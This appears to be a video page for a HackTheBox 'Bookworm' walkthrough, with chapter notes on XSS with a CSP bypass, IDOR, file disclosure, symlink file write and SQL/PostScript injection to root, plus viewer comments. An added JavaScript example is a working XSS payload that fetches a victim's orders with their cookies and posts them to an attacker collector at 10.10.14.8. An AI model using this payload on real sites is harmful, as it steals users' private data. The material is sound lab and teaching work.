HackTheBox - Bookworm

  • Published: 16 Jul 2024
  • 00:00 - Introduction
    00:50 - Start of nmap
    04:30 - Discovering a potential XSS in the Notes field of an order. Content Security Policy (CSP) blocks us, because inline JS is not allowed on the page. Looking for a file upload functionality.
    08:29 - Finding out we can upload anything we want to the avatar. This should allow us to bypass the CSP in the book edit field
    11:55 - Confirmed XSS on the page, checking if there's an IDOR Vulnerability that allows us to add notes to other people's items by creating a second account
    16:00 - Creating a Python Script that will automatically poison items in peoples basket (cart)
    28:00 - Basket Poisoner script is completed
    28:50 - Creating a JavaScript payload, explaining why I'm doing await, fetch, and helper functions.
    40:15 - Having the XSS Payload fetch profile, look for orders, then perform a get on all orders to examine the order page. Then send us the HTML of that page
    49:55 - Creating a Python Flask Server that will save all of the orders the XSS Payload sends us
    56:00 - Examining orders, discovering there is a "Download Everything" URL. Didn't show it, but there is no IDOR vulnerability here; need to have the XSS trigger it. Exfilling /etc/passwd
    01:12:00 - Extracting database.js, which contains the database information. The password lets us onto the system as Frank
    01:15:52 - EDIT: Examining the source code to show why downloading a single book was not vulnerable. Talking about setting the root option on Express's res.download
    01:21:04 - Enumerating the box as Frank discovering a second web application listening on 3001
    01:30:00 - Looking at the source code to the book converter.
    01:36:20 - Exploiting an SSRF/file disclosure vulnerability in the Book Converter, but it doesn't get us anything
    01:42:18 - Finding an arbitrary file write vulnerability in the Book Converter by abusing symlinks to bypass a file extension check.
    01:51:50 - Shell as Neil, who can run the GenLabel binary with sudo; examining it to discover a SQL + PostScript injection
    01:57:10 - Using the SQL injection to inject a file-write command into the PostScript file, which then gives us arbitrary file write as root
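The payload pattern from the 28:50, 40:15 and 49:55 segments, as an added example that is not the script written in the video: each step (fetch a page, pull the order links out of it, fetch each order, post its HTML to a collector) is its own async helper, and the caller awaits each one. `fetchFn` is passed in instead of using `window.fetch` directly so the same logic runs offline in Node against a constructed fake site; the paths /profile and /order/<id>, the link markup, and the collector URL are assumptions, not the box's real routes.

```javascript
// Added example, not the payload from the video. Assumed routes: /profile
// lists the victim's orders as <a href="/order/<id>">, and the collector
// accepts a POST at any URL. In a victim's browser you would call:
//   exfilOrders(window.fetch, 'http://10.10.14.8:5000/collect')

async function getText(fetchFn, url) {
  // Same-origin GET with the victim's cookies attached.
  const res = await fetchFn(url, { credentials: 'include' });
  if (!res.ok) throw new Error(`GET ${url} -> ${res.status}`);
  return res.text();
}

function extractOrderLinks(html) {
  // Unique /order/<id> hrefs, in first-seen order.
  const re = /href="(\/order\/(\d+))"/g;
  const seen = new Map();
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!seen.has(m[2])) seen.set(m[2], m[1]);
  }
  return [...seen.values()];
}

function postToCollector(fetchFn, collector, payload) {
  // mode: 'no-cors' plus a text/plain body keeps this a "simple" request,
  // so the browser sends it without a preflight; the response is ignored.
  return fetchFn(collector, {
    method: 'POST',
    mode: 'no-cors',
    headers: { 'Content-Type': 'text/plain' },
    body: JSON.stringify(payload),
  });
}

async function exfilOrders(fetchFn, collector) {
  const profile = await getText(fetchFn, '/profile');
  const links = extractOrderLinks(profile);
  const sent = [];
  for (const link of links) {
    // Every helper called here returns a promise, so each call is awaited;
    // a missing await would ship the Promise object instead of the HTML.
    const html = await getText(fetchFn, link);
    await postToCollector(fetchFn, collector, { path: link, html });
    sent.push(link);
  }
  return sent;
}

// Constructed stand-in for the target site and the collector (offline only).
const FAKE_PAGES = {
  '/profile':
    '<ul><li><a href="/order/1">Order 1</a></li>' +
    '<li><a href="/order/1">Order 1 (again)</a></li>' +
    '<li><a href="/order/7">Order 7</a></li></ul>',
  '/order/1': '<h1>Order 1</h1><p>Notes: hello</p>',
  '/order/7': '<h1>Order 7</h1><a href="/download/everything">Download Everything</a>',
};

function makeFakeFetch(pages, sink) {
  return async (url, opts = {}) => {
    if (opts.method === 'POST') {              // collector side: record what arrived
      sink.push(JSON.parse(opts.body));
      return { ok: true, status: 200, text: async () => '' };
    }
    const body = pages[url];
    if (body === undefined) return { ok: false, status: 404, text: async () => 'Not Found' };
    return { ok: true, status: 200, text: async () => body };
  };
}

async function demo() {
  const sink = [];
  const sent = await exfilOrders(makeFakeFetch(FAKE_PAGES, sink), 'http://collector.example/collect');
  return { sent, sink };
}

demo().then(({ sent, sink }) => console.log('exfiltrated', sent, 'collector got', sink.length, 'pages'));
```

The collector only has to log request bodies, which is all the Flask server built at 49:55 does; the dedup in extractOrderLinks matters because an order page typically links to itself more than once and you do not want the victim's browser fetching the same order repeatedly.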

Comments • 52

  • @Gordin508 5 months ago +6

    0:35 I fully expected that sentence to continue with "and by the end of the day, I had created my own Javascript framework".

    • @pa-vl1kg 5 months ago

      and then you realise that he doesn't understand the await operator, so he puts it even when he calls the async function LOL (line 13 in VC @46:30); also, he could have read the error message, it says it right there.

  • @boogieman97 5 months ago +7

    Wow, nicely done! I really like the way you have used classes in Python. The reason why asynchronous works so well is that it tells the CPU to switch threads while there is slack time when it isn't really processing something, so it jumps to another thread within the process, and it does that constantly. If you're cooking, you're also not going to stop and do nothing while the oven is preheating. 😅 👏

    • @boogieman97 5 months ago +1

      Ooh, and a const in a loop is not possible, since it is a constant and of an immutable type which can only be declared once and not updated within a while loop.

    • @ippsec 5 months ago +1

      Thanks that makes total sense

  • @0xdreadnaught 5 months ago +1

    I like how your videos have become reminders to release my season0 writeups lol
    great work as always man

  • @The_Dark_Cats 5 months ago

    That was some voodoo! I understood about 10% at best. But I really enjoyed watching this. Great job as always!

  • @tntxqx8281 5 months ago

    Nice work ippsec, keep going

  • @WyldeZk 5 months ago

    Loved this box! I used the XHR API for the JS script, but I'll definitely switch to the fetch API in the future

  • @cymzfr 5 months ago

    I love what you do and learn a lot, thanks ippsec ❤

  • @LePirate5930 5 months ago +1

    Thank you for the video, really appreciate it!

  • @perfectshow-bx1ov 5 months ago +1

    Thanks sirji for this video ❤❤❤

  • @pa-vl1kg 5 months ago +1

    @31:00 the best way to try JS code is not the console prompt, but by clicking the icon that is on the far right of the console prompt, called multi-line editor mode.

  • @malikkkk2679 5 months ago +2

    Great video as always, been looking forward to this one.
    Btw, I'm not sure if you're aware, but in the converter web app it's also possible to get RCE by uploading a file with the extension .recipe which contains Python code. Apparently the calibre converter will happily run any Python code in .recipe files :)

    • @ippsec 5 months ago +1

      I had no idea. That is cool

    • @AUBCodeII 5 months ago

      Hi, how did you find this out?

  • @souleymaneadellah1176 5 months ago +1

    Ippsec, I hope you start doing live boxes sometimes, just for us to see your thought process and maybe get a glimpse of how you do in real engagements

  • @blackmine57 5 months ago

    1:27:26 I love this "oh". That was so funny

  • @tg7943 5 months ago

    Push!

  • @coursachGPT 3 months ago

    What VS Code extensions do you use? The autocomplete looks awesome

    • @ippsec 3 months ago

      That is GitHub Copilot

  • @MusicDimensionYoutube 5 months ago +1

    Maybe that's a silly question, but in the last piece, when we try to write the key for root, couldn't we just modify the entry in the database with the PostScript payload and re-run the script, pretending there was no SQL injection in the Python script? Sorry about my probable grammar errors in that sentence 😅. Great video as always, we love IppSec.

    • @ippsec 5 months ago +1

      Umm, I hate myself right now, most likely you could totally do that 😂 I just didn't think of it

    • @MusicDimensionYoutube 5 months ago

      @ippsec I'm sorry, I didn't mean to point it out because I wanted to say that was a better way; that was not my intention at all. I was just wondering if that was possible, and to test my level of understanding 🤣. You showed anyway that the script was vulnerable to SQL injection, and how to benefit from that, so definitely your way is the best for us and for the sake of learning, as the purpose of your videos is sharing knowledge. As always you're the goat, thanks for all your videos.

    • @ippsec 5 months ago +1

      @MusicDimensionYoutube No, I'm happy you did haha. Was more sarcastic

    • @MusicDimensionYoutube 5 months ago

      @ippsec I totally get the sarcasm. I'm happy to know that modifying the entry was an option that could work. I'm still learning, and seeing that maybe I got something right makes me want to learn more, and definitely you're the right place to learn; your approach to solving the boxes is amazing, and the explanations of the steps you take to find the information and the beyond-root part are gold.

    • @AUBCodeII 5 months ago

      @MusicDimensionYoutube I believe it's not possible to write to the file /root/.ssh/authorized_keys doing what you suggested, because each injectable column can contain only up to 20 characters:
      Injectable columns: name, addressLine1, addressLine2, town, postcode
      MariaDB [(none)]> desc bookworm.Users \G
      *************************** 2. row ***************************
      Field: name
      Type: varchar(20)
      *************************** 6. row ***************************
      Field: addressLine1
      Type: varchar(20)
      *************************** 7. row ***************************
      Field: addressLine2
      Type: varchar(20)
      *************************** 8. row ***************************
      Field: town
      Type: varchar(20)
      *************************** 9. row ***************************
      Field: postcode
      Type: varchar(20)
      So, if you tried to change one of those columns to the PostScript payload, you would get an error saying you tried to insert too many characters into a column.

  • @orpheus0108 5 months ago

    Isn't the requests.Session() an instantiated object and therefore mutable? So wouldn't it be passed by object reference, meaning you wouldn't have to return anything to make changes to its data?
    I may be wrong, thoughts?

    • @ippsec 5 months ago

      I think you are correct. However, that is not how my brain thinks code/functions/etc. should work. So I avoid taking advantage of that.

    • @orpheus0108 5 months ago

      @ippsec ah yeah, I get what you mean. I love Python, but the weak typing makes things really ambiguous sometimes.

  • @apkanalyze3623 5 months ago

    Hi IppSec, there's something I'd like to clarify to ensure I'm not misunderstanding. We observed the "script-src 'self'" directive in the HTTP response, which, as I understand it, allows scripts to run only from the same origin as the webpage. However, we also made an attempt to provide our IP address (10.10.14.8), which is a different origin. Am I missing something? It confused me because you also said "I don't know what is blocking us".

    • @ippsec 5 months ago +1

      I believe it blocks the page itself from running JavaScript on itself, which is why the alert() did not work, and there's something that's blocking you from loading scripts externally, so you can't just directly point it at yourself. Which is why I needed to host the script on the server through the avatar. I never run code from a server on my own IP; I just exfil data there.
      That said, in hindsight, I never tried to just point the JavaScript back to myself and then do the malicious things there. I don't think it would work, but it's possible; it would be a good thing to try out yourself and see why it does or doesn't work.
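A compact model of the script-src evaluation discussed in this thread, added here as an example (not code from the box or the video). It parses a CSP header and reports whether a given script load is permitted, which makes visible why, under script-src 'self', an inline alert() fails, a script from 10.10.14.8 fails, and a file served by the site itself (the uploaded avatar) passes. The hostname bookworm.htb, the full header value and the avatar path are assumptions; 'strict-dynamic', path-level matching and wildcard hosts are left out, and ports are compared literally.

```javascript
// Added example: a simplified CSP script-src matcher, not browser code and
// not anything from the target. Assumed: page origin http://bookworm.htb,
// uploaded avatar served from /static/img/uploads/.

function parseCsp(header) {
  // "script-src 'self'; img-src *" -> Map { 'script-src' => ["'self'"], ... }
  // A repeated directive is ignored, as browsers do.
  const policy = new Map();
  for (const directive of header.split(';')) {
    const [name, ...values] = directive.trim().split(/\s+/).filter(Boolean);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), values);
  }
  return policy;
}

function hostSourceMatches(expr, pageOrigin, scriptUrl) {
  const target = new URL(scriptUrl);
  // Scheme-only source such as "https:" or "data:".
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return target.protocol === expr.toLowerCase();
  const hasScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(expr);
  let source;
  try { source = new URL(hasScheme ? expr : `http://${expr}`); } catch { return false; }
  // Without an explicit scheme the page's scheme matches (http may also be
  // upgraded to https); with one, the scheme must match exactly.
  const pageProto = new URL(pageOrigin).protocol;
  const schemeOk = hasScheme
    ? source.protocol === target.protocol
    : target.protocol === pageProto || (pageProto === 'http:' && target.protocol === 'https:');
  return schemeOk && source.hostname === target.hostname && source.port === target.port;
}

function scriptAllowed(policy, pageOrigin, script) {
  // script is { inline: true, nonce?: '...' } or { src: 'http://host/path' }.
  const sources = policy.get('script-src') ?? policy.get('default-src');
  if (!sources) return true;                           // nothing governs scripts
  if (sources.includes("'none'")) return false;
  const nonceOrHash = sources.filter((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  if (script.inline) {
    if (script.nonce && nonceOrHash.includes(`'nonce-${script.nonce}'`)) return true;
    // 'unsafe-inline' is ignored once any nonce or hash is present.
    return sources.includes("'unsafe-inline'") && nonceOrHash.length === 0;
  }
  return sources.some((s) => {
    if (s === "'self'") return new URL(script.src).origin === pageOrigin;
    if (s === '*') return true;
    if (s.startsWith("'")) return false;               // keywords never match a URL
    return hostSourceMatches(s, pageOrigin, script.src);
  });
}

const PAGE = 'http://bookworm.htb';
const POLICY = parseCsp("default-src 'self'; script-src 'self'; img-src 'self' data:");

function checkCases() {
  return {
    inlineAlert: scriptAllowed(POLICY, PAGE, { inline: true }),                          // blocked
    attackerHost: scriptAllowed(POLICY, PAGE, { src: 'http://10.10.14.8/x.js' }),        // blocked
    uploadedAvatar: scriptAllowed(POLICY, PAGE,
      { src: 'http://bookworm.htb/static/img/uploads/avatar.png' }),                     // allowed
    loosened: scriptAllowed(parseCsp("script-src 'self' 'unsafe-inline'"), PAGE, { inline: true }),
  };
}

console.log(checkCases());
```

One gate this model leaves out: after CSP permits the origin, the browser still inspects the response. If the avatar were served with an image Content-Type together with X-Content-Type-Options: nosniff, the script would be refused even though the policy allows it, so check the headers the upload is served with before relying on this bypass.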

  • @apkanalyze3623 5 months ago

    One more question: when we identify SQL injection in GenLabel and you mentioned that "it is not giving any new privileges", considering this binary runs with sudo, wouldn't executing a system command through SQL injection grant us a privileged shell? I mean without needing ps2pdf. I might be mistaken, but I'd like to find out.

    • @ippsec 5 months ago +1

      Running through SQL would still be a SQL user, not root. So having the option to exploit SQL or the injection into the PDF generator... I go for PDF gen since that is running as root.

  • @sassywoocooo 5 months ago +2

    Hey ippsec, would you consider doing THM too?

    • @9Eriku 5 months ago +1

      Curious about this too.

    • @ippsec 5 months ago +5

      Nope, when they launched we got off on the wrong foot, and I also didn't enjoy their content. I feel there's less effort put into making sure it's quality content. Could have changed now, but I have no reason to check them out. Also, I do work for HackTheBox now; I did not for the first few years of doing videos. So not only would I be highlighting a site I don't support, I'd also be highlighting a competitor.

    • @sassywoocooo 5 months ago

      @ippsec in terms of content quality, you're absolutely right. TryHackMe seems to be making very "small" boxes in comparison to HackTheBox, so I understand your point.

    • @AUBCodeII 5 months ago

      @ippsec you are HTB employee of the month (read this in Simeon Yetarian's voice)

    • @tntxqx8281 5 months ago

      Good point

  • @blaise-of-glory 5 months ago +2

    First

  • @sotecluxan4221 5 months ago

  • @AUBCodeII 5 months ago

    Ip, Ipp and Ippy

  • @user-cb5yk4gk9u 5 months ago

    When did you learn Python, ippgoat?

  • @0xrod 5 months ago

    @ippsec when copying Node source code, you can skip node_modules. Much lighter and faster.

  • @Exodia1988 5 months ago

    23:33

  • @RISE_BEFORE_YOU_DIE 5 months ago

    Too many jokes about JavaScript in programming memes call JavaScript a drunken language 😂😂
    Async/await just works on functions 😅
    That's what I know, I'm a Java dev 😂

  • @AUBCodeII 5 months ago

    1:14:55 ipp-womp-womp.mp3